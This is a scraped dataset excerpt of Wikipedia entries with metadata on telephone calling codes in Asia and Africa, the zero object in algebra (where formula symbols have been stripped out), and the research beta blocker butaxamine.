Telephone numbers in Asia have the most possible prefixes of any continent on Earth: 2, 3, 6, 7, 8, 9. Below is a list of country calling codes for various states and territories in Asia. States and territories with country calling codes States and territories without a separate country calling code See also Telephone numbering plan National conventions for writing telephone numbers List of country calling codes List of international call prefixes Communications in Asia International telecommunications Telecommunications in Asia Telephone numbers
Telephone numbers in Asia
[ "Mathematics" ]
94
[ "Mathematical objects", "Numbers", "Telephone numbers" ]
7,455,708
https://en.wikipedia.org/wiki/Telephone%20numbers%20in%20Africa
The following are country calling codes in Africa. States and territories with country calling codes States and territories without a country calling code References Communications in Africa International telecommunications Telephone numbers Telecommunications in Africa
Telephone numbers in Africa
[ "Mathematics" ]
37
[ "Mathematical objects", "Numbers", "Telephone numbers" ]
7,455,889
https://en.wikipedia.org/wiki/Zero%20object%20%28algebra%29
In algebra, the zero object of a given algebraic structure is, in the sense explained below, the simplest object of such structure. As a set it is a singleton, and as a magma has a trivial structure, which is also an abelian group. The aforementioned abelian group structure is usually identified as addition, and the only element is called zero, so the object itself is typically denoted as . One often refers to the trivial object (of a specified category) since every trivial object is isomorphic to any other (under a unique isomorphism). Instances of the zero object include, but are not limited to the following: As a group, the zero group or trivial group. As a ring, the zero ring or trivial ring. As an algebra over a field or algebra over a ring, the trivial algebra. As a module (over a ring ), the zero module. The term trivial module is also used, although it may be ambiguous, as a trivial G-module is a G-module with a trivial action. As a vector space (over a field ), the zero vector space, zero-dimensional vector space or just zero space. These objects are described jointly not only based on the common singleton and trivial group structure, but also because of shared category-theoretical properties. In the last three cases the scalar multiplication by an element of the base ring (or field) is defined as: , where . The most general of them, the zero module, is a finitely-generated module with an empty generating set. For structures requiring the multiplication structure inside the zero object, such as the trivial ring, there is only one possible, , because there are no non-zero elements. This structure is associative and commutative. A ring which has both an additive and multiplicative identity is trivial if and only if , since this equality implies that for all within , In this case it is possible to define division by zero, since the single element is its own multiplicative inverse. Some properties of depend on exact definition of the multiplicative identity; see below. Any trivial algebra is also a trivial ring. A trivial algebra over a field is simultaneously a zero vector space considered below. Over a commutative ring, a trivial algebra is simultaneously a zero module. The trivial ring is an example of a rng of square zero. A trivial algebra is an example of a zero algebra. The zero-dimensional is an especially ubiquitous example of a zero object, a vector space over a field with an empty basis. It therefore has dimension zero. It is also a trivial group over addition, and a trivial module mentioned above. Properties The zero ring, zero module and zero vector space are the zero objects of, respectively, the category of pseudo-rings, the category of modules and the category of vector spaces. However, the zero ring is not a zero object in the category of rings, since there is no ring homomorphism of the zero ring in any other ring. The zero object, by definition, must be a terminal object, which means that a morphism  must exist and be unique for an arbitrary object . This morphism maps any element of  to . The zero object, also by definition, must be an initial object, which means that a morphism  must exist and be unique for an arbitrary object . This morphism maps , the only element of , to the zero element , called the zero vector in vector spaces. This map is a monomorphism, and hence its image is isomorphic to . For modules and vector spaces, this subset  is the only empty-generated submodule (or 0-dimensional linear subspace) in each module (or vector space) . Unital structures The object is a terminal object of any algebraic structure where it exists, like it was described for examples above. But its existence and, if it exists, the property to be an initial object (and hence, a zero object in the category-theoretical sense) depend on exact definition of the multiplicative identity 1 in a specified structure. If the definition of  requires that , then the object cannot exist because it may contain only one element. In particular, the zero ring is not a field. If mathematicians sometimes talk about a field with one element, this abstract and somewhat mysterious mathematical object is not a field. In categories where the multiplicative identity must be preserved by morphisms, but can equal to zero, the object can exist. But not as initial object because identity-preserving morphisms from to any object where do not exist. For example, in the category of rings Ring the ring of integers Z is the initial object, not . If an algebraic structure requires the multiplicative identity, but neither its preservation by morphisms nor , then zero morphisms exist and the situation is not different from non-unital structures considered in the previous section. Notation Zero vector spaces and zero modules are usually denoted by (instead of ). This is always the case when they occur in an exact sequence. See also Nildimensional space Triviality (mathematics) Examples of vector spaces Field with one element Empty semigroup Zero element List of zero terms External links Ring theory Linear algebra Object Objects (category theory)
Zero object (algebra)
[ "Mathematics" ]
1,063
[ "Mathematical structures", "Objects (category theory)", "Ring theory", "Fields of abstract algebra", "Category theory", "Linear algebra", "Algebra" ]
7,456,469
https://en.wikipedia.org/wiki/Butaxamine
Butaxamine (INN; also known as butoxamine) is a β2-selective beta blocker. Its primary use is in experimental situations in which blockade of β2 receptors is necessary to determine the activity of the drug (i.e. if the β2 receptor is completely blocked, but the given effect is still present, the given effect is not a characteristic of the β2 receptor). It has no clinical use. An alternative name is α-(1-[tert-butylamino]ethyl)-2,5-dimethoxybenzyl alcohol. See also Bupropion Methoxamine References Beta blockers Beta-Hydroxyamphetamines Tert-butyl compounds
Butaxamine
[ "Chemistry" ]
153
[ "Pharmacology", "Pharmacology stubs", "Medicinal chemistry stubs" ]